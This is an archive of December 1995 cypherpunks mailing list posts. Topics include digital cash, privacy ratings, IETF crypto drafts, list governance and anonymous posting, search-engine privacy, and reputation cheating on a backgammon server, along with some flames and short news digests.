Message-ID: <9512271711.AA13714@hosaka.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



The thing  I'd like to understand about Cybercash is... how do I get the
cash back out of the system?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 15:39:28 +0800
To: cypherpunks@toad.com
Subject: proposal for new cyber abbreviation
Message-ID: <199512271947.LAA22943@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc.
ad nauseam. (I have reason to believe that PTB, or "powers that be" was
actually invented here on this list!!) 

anyway after reading recent messages I propose:

SHTBD!!!!

as in, Something Has To Be Done.

used either seriously or satirically (probably mostly satirically by
everyone here).

example:

"there was a editorialist on TV ranting about the 4 horsemen of the
infocalypse and screeching that SHTBD!!!"

or,

"I was not implying that SHTBD, merely that we are moving into a brave
new world in cyberspace".

or,

"those @#$%^&* online pedophiles are crawling all over the net. SHTBD!!!"

or,

"the @#%^^&* mainstream press is always pointing out new bogeymen
with the concluding moral, SHTBD!!!"


notice that SHTBD is the antithesis of cypherpunk philosophy in that
it tends to imply

1. government intervention
2. coercive force
3. censorship

etc.

hence by using this term and popularizing it, we promote our own agenda
of "cryptoanarchy".

just my small contribution to humanity for today.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 16:32:36 +0800
To: cypherpunks@toad.com
Subject: cool cpunk project proposal: "cpunk approved" logo
Message-ID: <199512271959.LAA23984@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



recently my local newspaper ran a section on privacy preservation
in cyberspace. it quoted Dave Banisar of CPSR as talking about how
future companies might have a "privacy safe" sticker affixed to them.

*wow*, what a great idea. this would be a great project for the cpunks.

most people here are familiar with Point Communications and how they
do the "top 5% of web sites" and authorize sites to use their logo.
this is such a neat idea: it's one of the first reputation rating 
companies in existence, in a sense. furthermore, it's *private*.
TCM and others have advocated that these companies are going to become 
ubiquitous (rating *everything* including hot-button things like
doctors, lawyers, hit men, etc. <g>) and I can see it happening quickly.

here's my idea that some enterprising cpunks might like to 
pursue. 

create a CYPHERPUNK PRIVACY SAFE logo and distribute it to various 
companies who adhere to the criteria that it names!!!

the steps would be:

1. create a logo
2. create a set of criteria for companies who are "privacy safe" or who
adhere to cpunk privacy guidelines. 
3. write out this list in careful detail. one might also have different
levels or grades, such as "level 5 privacy protection" etc.  one could
conceivably use it as a negative reinforcement too, handing out "F's"
to the worst companies.
4. POPULARIZE this. get companies to put the logo on their sites like
they do with the Web logo. 

now, I don't know if people here realize how much great potential this
idea has. the media just LOVES to quote these kinds of judgements when
it's a slow news day (witness Blackwell's "worst dressed" list or
"best haircuts" or whatever else).

the immediate objection I can see is that all kinds of people such as
PM will rant that there is no "official" cpunk privacy standard. great!!
I propose somebody create their OWN and call it that without any
reservations. if the cpunk name is not copyrighted, if no one owns it,
then anyone can do whatever they want with it!!! ah, that's glorious anarchy
for sure.

if multiple standards emerge, I'm sure one will tend to become dominant,
or at least the competition between them will have them covering 
different areas (such as FAQs in newsgroups work).

this idea really has FANTASTIC protential imho. in fact I propose that
Community Connection is in a really excellent position to latch onto this
idea-- they already have many press releases and the industry is watching 
them.

notice that this sticker could be used to handle the key escrow issues as
well-- like one of the levels being that the company is ideologically
opposed to mandatory key escrow or something. different levels of 
cryptography could be involved. someone will have to experiment with
perhaps multiple logos and different grades. remember, the thing should
be as absolutely obvious and easy to comprehend as possible for even
Joe Sixpack to get it.

let's create a cpunk "approval" rating that has as much recognition some
day as the "intel inside" ad campaign has generated!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 28 Dec 1995 12:20:05 +0800
To: cypherpunks@toad.com
Subject: Some IETF drafts possibly of interest
Message-ID: <9512271701.AA17855@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Internet-Drafts are available by anonymous FTP to ds.internic.net in the
directory internet-drafts.  Other places, too -- don't ask me, tho; for
questions, please mail to Internet-Drafts@cnri.reston.va.us.

The first two seem interesting even if SKIP has no future in IPng.
The last is useful because I keep pushing GSSAPI as a standard crypto
API. :)
       Title     : Encoding of an Unsigned Diffie-Hellman Public Value     
       Author(s) : A. Aziz, T. Markson, H. Prafullchandra
       Filename  : draft-ietf-ipsec-skip-udh-00.txt
       Pages     : 6
       Date      : 12/22/1995
It is useful to be able to communicate public keys in the absence of a 
certificate hierarchy and a signature infrastructure.  This document 
describes a method by which certificates which communicate Diffie-Hellman 
public values and parameters may be encoded and securely named.            

							
       Title     : Certificate Discovery Protocol                          
       Author(s) : A. Aziz, T. Markson, H. Prafullchandra
       Filename  : draft-ietf-ipsec-cdp-00.txt
       Pages     : 13
       Date      : 12/22/1995
Use of Public key cryptography is becoming widespread on the Internet in 
such applications as electronic mail and IP Security (IPSEC).  Currently, 
however, a common public key certificate infrastructure does not exist 
which is interoperable with other systems and ubiquitous.  In light of 
this, we describe a protocol which may be used to exchange or retrieve 
certificates (essentially signed public keys) with or from another entity. 
The protocol may be used to request certificates from a directory/name 
server or from the entity who owns the certificate.                        

       Title     : The Simple Public-Key GSS-API Mechanism (SPKM)          
       Author(s) : C. Adams
       Filename  : draft-ietf-cat-spkmgss-05.txt
       Pages     : 42
       Date      : 12/22/1995
This specification defines protocols, procedures, and conventions to be 
employed by peers implementing the Generic Security Service Application 
Program Interface (as specified in RFCs 1508 and 1509) when using the 
Simple Public-Key Mechanism.                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 28 Dec 1995 17:11:16 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <199512271725.MAA00248@jafar.sware.com>
Message-ID: <199512272022.MAA25782@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>As Tim May has explained over and over again, "the cypherpunks" do not
>exist.  Cypherpunks is a mailing list, not a society or club.
>"The cypherpunks" as a group can do nothing about what gets posted to
>this list except comment on it.

there are various myths here that ought to be addressed. 

- if the cypherpunks are not really a group, then people wouldn't get
upset what goes under the cypherpunk name. but in fact people flame
hotly what others think is or is not a "legitimate" cypherpunk tactic
or project or whatever.

you can't have it both ways. either anyone is free to decide what a 
cypherpunk is, and no one has the right to argue with it. or, cypherpunks
are something in particular, and someone has the authority to  determine
that.

so far the "authorities" are those who have been on a the list a long time.
(it is still an informal system however).  this is a reasonable system. 
but I object to the way that people such 
as PM argue in one message that "there is no such thing as the cypherpunks"
but then endlessly determine themselves what is appropriate for the list.
doesn't anyone see the inconsistency-at-best-and-hypocrisy-at-worst of this?

- its simply not true that no one can do anything about what is posted here.
there are different ways of running a mailing list. here are some things
that would be different than what is going on right now. I'm not saying
they are better, but just remember there are alternatives:

= moderator keeps a higher profile, posts under his own name, keeps order,
determines apropriateness
= no one argues with moderator or each other about valid topics
= list can bar people who are not subscribed from posting. this would
in fact  bar "hit and run" anonymous messages. however obviously the 
current list adminstration favors them.
= the list charter can ask for people to submit to various practices on
the honor system, such as not using pseudonyms. cryptoanarchists who
hate the idea of trust are of course going to object to the honor system,
because "that which cannot be enforced should not be prohibited".

>Finally, it should be noted that the kind of messages you're posting
>lately are eerily reminiscent of Detweiler's mental deterioration just
>before he went off the deep end.  In fact, the line "How long will the
>cypherpunks put up with this?" may be an exact quote.

perhaps Detweiler is in fact really a pseudonym of Cohen. or maybe 
Cohen and Detweiler and all other anonymous posts are really a big
joke being played on everyone by TCM. although you may have an interesting
point there. perhaps thinking about trying to impose order on cryptoanarchists
(who themselves occasionally rant about the disorder amongst themselves, 
although never in those terms) is a sure recipe for frustration insanity. 

caveat emptor!!

(the list, as it is currently set up, is highly vulnerable to agents 
provacateur.  crpytoanarchists should realize that the same "disorders"
 (oh, sorry, "freedoms") such as completely unrestrained anonymous posting,
 no "official" moderation etc.  they favor can be used very 
effectively against them when an intelligent an 
mischievous adversary so chooses or is provoked to do so. there 
have been visceral demonstrations of this on occasion here <g>)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Dec 1995 13:16:30 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <9512271343.AA13409@all.net>
Message-ID: <199512271725.MAA00248@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cohen writes:
> 
> We just heard from another anonymous poster trying to destroy our rights
> to free speech.  How long will the cypherpunks put up with this?

As Tim May has explained over and over again, "the cypherpunks" do not
exist.  Cypherpunks is a mailing list, not a society or club.
"The cypherpunks" as a group can do nothing about what gets posted to
this list except comment on it.

BTW, it would be helpful if you would provide some context when you 
complain or comment about another posting.  At the time I read your note,
it was the only cypherpunks note in my mailbox.  Perhaps I read some
message earlier from the ECafe anonymous mailer but if so, it certainly
wasn't remarkable enough to leave a lasting impression.

Finally, it should be noted that the kind of messages you're posting
lately are eerily reminiscent of Detweiler's mental deterioration just
before he went off the deep end.  In fact, the line "How long will the
cypherpunks put up with this?" may be an exact quote.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 28 Dec 1995 18:47:32 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews and Alta Vista Search Tools, and Privacy Implications
Message-ID: <199512272027.MAA18633@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:28 AM 12/27/95 -0800, tcmay@got.net (Timothy C. May) wrote:
>Anyway, a point of clarification of a point, lest there be the belief that
>_all_ Cypherpunks are opposed to comprehensive Web search tools:
......
...offshore...
......
>Face it, every single word written by any of us to any Usenet newsgroup,
>going back to the beginning of Usenet, and expanding out to many
>ostensibly-private mailing lists, will fairly soon be searchable. 

The Internet not only makes it easier for everybody to get their
15 minutes of fame, it guarantees that anything stupid you've said 
in public over the last 15 years will be available to the entire world.
So deal with it...  I'm more bothered by people indexing what I read.

What kinds of Cypherpunk technology can we use to affect this?
I don't think we need to do too much work on _increasing_ data collection;
the commercial markets will figure that one out fast enough,
though understanding technical possibilities enough to stay ahead is good.
Remailers and nymservers are obvious starts on the information-hiding end,
and even the basic non-encrypted cypherpunks remailers are good enough
for most applications.  The problem is getting them widely deployed.
I've seen a couple of web-page-based remailers, and they're probably
easy to deploy widely; they're not very secure without SSL, but they're
a start, and people on SSL-equipped systems can run them securely.
Anon web proxies are more work to deploy, but they're not mysterious,
and the main limits to deploying them are economics.

Nymservers, however, are still pretty new - technology like anon.penet.fi
is generally good enough for most people if you've got an operator you trust,
and an economic base that makes it worth running them.  But the more secure
nymservers are still complex, and probably not something the average hacker
can just pop up and run - we probably need to explore them more before
it'll be easy to do.

While I like getting services provided through community spirit, like most of 
the remailers, I suspect Tim's right that pay-per-use privacy services
are going to evolve, and probably dominate.  Among other things, they're in
the balance between the couch-potato on-line services and real Internet
connections; they're probably more likely to be offered by people who want
full-time connectivity, and will be used to offset the slightly higher costs
of real service.  However, partly due to patent issues, and partly just to
convenience, I don't think they all need to use fully-anonymous digicash
for every transaction; most of them can get by with service-provider tokens 
that may be paid for by digicash or by less-anonymous systems.

One of the main threats I see to privacy services is the Exon bill -
it's pretty obvious that most US service providers will have to limit
access to people over 18, in spite of any of the Good Senator's claims
otherwise.
If the Feds start making examples of people before any serious court cases
get decided (or after, if the good guys lose), that probably means 
that service providers will have to check ID to protect themselves.
There may be a market for services that validate that their customers
are over 18, but provide anonymity within that.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Thu, 28 Dec 1995 18:45:32 +0800
To: cypherpunks@toad.com
Subject: Reputation capital: FIBS case study
Message-ID: <2sY4wMz2BcRC083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I am currently engaging in a reputation adjustment of a certain player
on FIBS, the First Internet Backgammon Server (see my homepage).
Reputation is important on FIBS, and I thought it might be informative
to examine the ways it can work in the [more-or-less] real world.

FIBS allows various levels of nymity, and various modes of reputation.

Each player picks a pseudonym as his FIBS name.  These can range from
the crypticly anonymous nym, to some variant of the player's real name.
The server will also disclose the FQDN from which the nym is connected,
or was most recently connected.  If she wants, the player may include
any information, typically such as an email address, in an "address"
field in her player profile.  Or something cute, or nothing.  Players
may also choose to have a web page listed under their nym, on a page
full of such listings.  Players may participate in the newsgroup
(rec.games.backgammon), identifying themselves in their posts by 
any or all or none of {their FIBS nym, their real name, their email
address}.

Reputation has several components on FIBS.  Of course, personal 
experience with another nym is hugely significant, when it exists.
When that is absent, or not conclusive, there are other sources of
reputation which may be consulted.  The server reports two
numbers for each player, representing distinct reputation criteria:
the "rating" is a weighted score representing the won/less record;
the "experience" is a count representing how many games this player has
played.  Before I mention other reputation indices, I want to amplify
on these two.  When negotiating with another player about possibly
starting a new match, and about the length in points of the potential
match, most players will think about various aspects of the reputation
of the prospective opponent.  Depending on the circumstances, the
difference in ratings may be decisive, in straightforward ways, for
evaluating an invitation.  Of particular relevance to past discussion
on cypherpunks, the experience number is usually very important also.
Those with a high experience level, and perhaps a name that you recall
having seen before, are trusted more than nyms with little investment
in their reputations.  Experience matters a lot, because one of the
key strategies is to avoid becoming involved with unpleasant or 
dishonest players.  If someone has a huge experience number, you can
be fairly sure that you would have heard about it if they are somehow
undesirable.  

As FIBS is an open server, operating without charge to the users,
we get a wide variety of newcomers every day.  Some persist, and
become better known, and others lose interest and don't return.
Most are [more-or-less] agreeable and [more-or-less] ethical; however
some nyms will exhibit certain recurring problem behaviors, and quickly
begin to accrue negative reputation.  On common problem is the use of
profanity or the advocacy of various forms of bigotry, in "shout"ed 
comments or private messages, and the closely related hounding of 
players with female-sounding nyms by unwanted come-ons.  This behavior
is generally countered with "shout"ed and "tell"ed replies, and with
the "gag <name>" command which kills your copy of any further remarks 
from that user.  The negative reputation resulting from this behavior 
is pretty much instantaneous and self-documenting, with reinforcement 
from anyone who is enraged enough to remember and to heckle the offender 
at a later login.  Some of us are more sensitive about this than others,
so the offensiveness is just another variable in reputation, not always
the decisive one.

The thorniest problem in our reputation economy continues to be the
case of the player who drops out of a match when clearly losing, to avoid
the decrement of his rating number (based on match results only, not on
individual games).  Such players follow a strategy of playing winning
matches to completion, which increases their rating, but bailing out of
losing matches before they end.  When a match is interrupted, the server
remembers it, and the two players can resume later, by mutual agreement.
Almost all players are ethical enough to resume even losing matches, and
eventually to complete them.  The problem folks are the ones who ignore
or refuse requests to resume.  Avoiding such players is a key strategy
for serious FIBS regulars.  One indicator here can be a complex function
of the rating and experience numbers: a player with fairly low experience
but an unexpectedly high rating is one of two things -- either a very
strong player, or else a match dropper.  (Or else very lucky, but we
prefer to think of that as strength of play.)  The best defense we have
found against the match dropper is complaining in the newsgroup.

I just posted a warning in the newsgroup about a new match dropper which
I had the misfortune of playing against.  I accepted an invitation from
him last Saturday, to play a 3 point match.  I looked over his info
before I accepted, and decided to give him a chance: no email address,
experience = 57, and rating showing slightly more wins than losses, from
a site at a college in Britain.  I won the first game for 2 points, and
was pretty clearly winning the next game, which would make me win the match.
When "dorion" rolled a game-losing double five, he immediately dropped
his connection to FIBS.  The server saved the match, and I waited around
for awhile to see if he would come back.  He didn't.  Now at this point,
I'm not yet ready to start in on his reputation.  After all, we all have
host problems, and phone problems, and personal problems.  It's still 
possible that he and I will meet later, and finish the match.  (I'm 
skeptical, because the timing of it is just too convenient, but I hold
my tongue).  Finally Tuesday, I was hanging on FIBS when dorion returned.
I asked politely if we could finish, but dorion immediately logged out
without replying.  I stayed connected to FIBS, while I did some other 
work on other VC-s.  

Before long, dorion was back, my little watchdog macro beeped for me, 
and I again politely asked him to resume.  Instead of replying, 
he started a fresh match vs. a brand new player, experience
equal zero.  I started watching their match, where I asked again if
we could resume sometime.  While I wasn't getting an answer, I looked 
into the new player's information: connected from exactly the same
site as dorion!  This of course, is a warning sign of the other common
form of ratings cheating -- creating two nyms for one person, and 
playing against oneself, with one nym always winning and the other
always losing.  Well, again I got no reply to my requests, and both
nyms suddenly disconnected without finishing their match.

At this point, I set about trashing dorion's reputation.  I posted
a (PGP signed) article to the newsgroup setting forth the facts.
When I came back on today, there was one followup from another player
who had a similar experience with dorion.  When I signed onto FIBS,
I got a "tell" from a trusted, veteran nym saying that dorion and his
alter-ego nym BatesMotel had just been on, and played a couple of 
one-sided and not at all credible matches vs. each other.  I checked
their ratings/experience and followed up to my own article with a
definite advisory against playing against either nym.

Now, despite many elaborate proposals over the years, discussed at length
in the newsgroup, there is no automated mechanism for dealing with this
sort of negative reputation.  I have a personal "don't-play" list I keep
up to date, as do many others.  My complaint surely got dorion and
BatesMotel into many such personal lists, and neither nym is likely to
last on FIBS.  

I'm not really asking for suggestions here or anything.  It's likely that
most of them have already been debated to death on r.g.b.  I just wanted
to show you a case of reputation markets in action.

::::::::::::::::::::::::::::::::::::::    Thank you VERY much!  You'll be 
::  Lou Poppler <lwp@mail.msen.com> ::   getting a Handsome Simulfax Copy 
::      http://www.msen.com/~lwp/   ::   of your OWN words in the mail
::::::::::::::::::::::::::::::::::::::   soon (and My Reply).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Thu, 28 Dec 1995 20:45:27 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE
Message-ID: <199512271221.NAA06057@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


: At 01:12 PM 12/26/95 -0800, sameer wrote:
: > The Apache-SSL Commerce webserver is the only commercial encrypting
: > webserver with source available. Ian Goldberg, graduate student at
: > U.C. Berkeley, well-known for his work on SSL security, commented on
: > the importance of available source,


ftp://ftp.hacktic.nl/pub/replay/pub/apache/

  -AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 28 Dec 1995 18:28:00 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews and Alta Vista Search Tools, and Privacy Implications
In-Reply-To: <ad065486000210045fdd@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951227134730.9098H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



[Re: regulating dossiers et. al.]

I'm sure that Phil Hallam-Baker has brought this up before, but there is 
a fair body of law on this subject internationaly. Probably the most 
restrictive is the UK Data Protection Act which regulates
 storage of personal information on computers (but not on paper). The 
DPA has a lot of holes, and seems to be honoured more in the breach than 
in the observance; other european countries have similar requirements. 

Of course, the UK has no FOIA, and won't until after the next election, 
so the most interesting databases aren't available.

Simon
-----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 28 Dec 1995 15:54:14 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Some IETF drafts possibly of interest
In-Reply-To: <9512271701.AA17855@sulphur.osf.org>
Message-ID: <199512271913.OAA06367@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> The first two seem interesting even if SKIP has no future in IPng.

Thats why the group pushed Ashar to split up his document up (at the
IETF meeting in Dallas earlier this month).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Dec 1995 03:04:04 +0800
To: cypherpunks@toad.com
Subject: DOP_lip
Message-ID: <199512271913.OAA21386@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-27-95. WashP:

   The CIA's close-rankled directorate of operations aim to
   trashtalk Deutch out of depensioning the veteran Paris CoS
   for French economic spay of pigs.

   DOP_lip







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 28 Dec 1995 20:45:32 +0800
To: cypherpunks@toad.com
Subject: GEY_ser
Message-ID: <199512271915.OAA21557@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-27-95. W$Jug:


   A test of superfast cable modems at Boston College prove
   addictive to speed freak faculty and students downloading
   junk data in seconds not minutes and hours, thus
   accelerating mind-rupture.

   And, an editorial red flags the telecom billions giveaway;
   nags Republicans to shut the geyser and not-reg the I-Way.


   GEY_ser






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Dec 1995 20:11:02 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE
Message-ID: <199512271950.OAA04721@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ Non-crypto garbage deleted ]

The Vince Foster articles were more relevant than this
garbage (not to mention the fact they made more sense).


P.S.  This post is in the public domain.

          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOGjoCoZzwIn1bdtAQHRJwF/fATfL+ZmsLlB8wgGdme5QkXExqw8Fa0G
MZuaH93wUT5B+VgTQSuWPfqfd+zaUUTo
=jf8w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Thu, 28 Dec 1995 20:46:11 +0800
To: cypherpunks@toad.com
Subject: DOS - MD5 - Thanks
Message-ID: <Pine.3.89.9512271424.D29727-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to everyone who offered help on the MD5 for DOS.
Greg Broiles pointed me to the pgp source, which may do the
trick. (There is MD5 module in pgp[?]) I will investigate.

For everyone's info, didn't find a freestanding dos 
implementation, tho.  My copy of Schneier didn't have the
disk, so I don't know if it's there, either.
--
PJP







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Thu, 28 Dec 1995 20:45:50 +0800
To: cypherpunks@toad.com
Subject: Crypto specialist wanted
Message-ID: <Pine.3.89.9512271512.A2054-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


CSI's most recent _Computer Security Alert_ has a listing for:
Cryptographic specialist for a San Diego based firm.  Headhunter's
address is: vfalcon@onramp.net

(I know this is isn't jobs.misc, but traffic having been relatively
light, I'm passing this on to others who may be interested in
crypto, but aren't on CSI's mailing list.  Now back to frequency
hopping radios and Anti-Fred)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 28 Dec 1995 17:54:28 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE
Message-ID: <199512272034.PAA04934@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ More non-crypto garbage deleted ]

> > God, you are annoying Fred, ER, I meant, "Alice".

> My dearest Perry.

> I am not Fred.  I am not he.  He is not me. Got it??  We aren't even in
> the same category or the same country.  Fred's an American, and I am not.

But you do have much in common.  Perry did not say that you are Fred,
but instead implied he mixed the two of you up (quite understandable).

> Scary, isn't it??  A non-American ...

What's scary is a non-American foaming at the mouth about American
politics when I'm sure his own country is far from perfect.


P.S.  This post is in the public domain.

          G. E. T. A. F. U. C. K. I. N. G. C. L. U. E.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOGt6yoZzwIn1bdtAQHvtwGAyZvsHKR64N1cPI6R95HiyMfuSuATVQNP
BeXflQ0LGAhRHeXH9V8TUO79RBTe0y80
=m+al
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 28 Dec 1995 21:39:32 +0800
To: cypherpunks@toad.com
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <ad0710d0020210049d6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 12/27/95, Jeff Barber wrote:
>Fred Cohen writes:
>>
>> We just heard from another anonymous poster trying to destroy our rights
>> to free speech.  How long will the cypherpunks put up with this?
>
>As Tim May has explained over and over again, "the cypherpunks" do not
>exist.  Cypherpunks is a mailing list, not a society or club.
>"The cypherpunks" as a group can do nothing about what gets posted to
>this list except comment on it.

Precisely.

Some of the many advantages of having no centralized structure/leadership,
and no formal rules/policies, are:

-- less wrangling over leadership and rules (if you think we wrangle and
fight too much, look at organizations that spend *all* of their time
choosing leaders, having boardroom fights, setting policies, fighting,
electioneering, etc...it makes our easily-filtered flame wars pale by
comparison)

-- no leaders means no one in a position of leadership to sue for the many
"infractions" some of our list members commit (violations of export laws,
posting of stolen code, libel, etc., all allegedly, of course)

-- no centralized focus, save for the toad.com machine, which could be
replaced quickly (or cypherpunks could become "alt.cypherpunks" and then
truly have no center, not that I am advocating this, for various reasons).
This lack of a point of pressure, a center, means opponents have nothing to
jab at...they can't write threatening letters to the "Board of Directors"
demanding that certain actions cease, etc.

>Finally, it should be noted that the kind of messages you're posting
>lately are eerily reminiscent of Detweiler's mental deterioration just
>before he went off the deep end.  In fact, the line "How long will the
>cypherpunks put up with this?" may be an exact quote.

Indeed. When I saw this "How long will the Cypherpunks put up with this?" I
initially thought it was tongue in cheek. Apparently not.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 28 Dec 1995 18:45:08 +0800
To: die@die.com
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt]
In-Reply-To: <9512270551.AA23874@pig.die.com>
Message-ID: <Pine.SV4.3.91.951227172231.18209H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> 	That is not what Mr Shannon says,  Shannon's law relates date

   That's Dr Shannon to you, kid.....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 28 Dec 1995 20:43:23 +0800
To: cypherpunks@toad.com
Subject: Did anyone see...
Message-ID: <v03004201ad07a28dbc90@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


On C-Span today:

2:06 pm ET/11:06 am PT
Secret Codes Used in World War II
National Security Agency


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 28 Dec 1995 19:42:53 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <199512272022.MAA25782@netcom17.netcom.com>
Message-ID: <199512272229.RAA02161@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Not-Detweiler writes:

> >As Tim May has explained over and over again, "the cypherpunks" do not
> >exist.  Cypherpunks is a mailing list, not a society or club.
> >"The cypherpunks" as a group can do nothing about what gets posted to
> >this list except comment on it.
> 
> there are various myths here that ought to be addressed. 
> 
> - if the cypherpunks are not really a group, then people wouldn't get
> upset what goes under the cypherpunk name. but in fact people flame
> hotly what others think is or is not a "legitimate" cypherpunk tactic
> or project or whatever.

And flame hotly is the full extent of what can be done by "the cypherpunks".

The point I'm making is that "the cypherpunks" can't do anything about
anonymous posters or other such "problems".  It's pretty pointless to
ask the list how long "we" will "put up with" postings made by an anonymous
person.  There's nothing I nor any other J. Random Cypherpunk can do about
it, even if I/we wanted to (which I, at least, do not).  This is not at
all the same issue as whether a given post is on-topic or whether a
given opinion is cypherpunk-correct (not that there's much I can do
about those things either).

In any case, the only time most folks on this list get "upset" is
when someone on the list tries to say or imply that they represent
"the cypherpunks" or "the cypherpunk point of view".  Of course he/she
is free to do so anyway, but should expect to get "flamed hotly" if
someone disagrees.

[ Rest of rant also beside the point ]


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@tssun5.dsccc.com
Date: Fri, 29 Dec 1995 15:08:39 +0800
To: Livingood/WSC@hks.net
Subject: Re: Employer Probing Precedents?
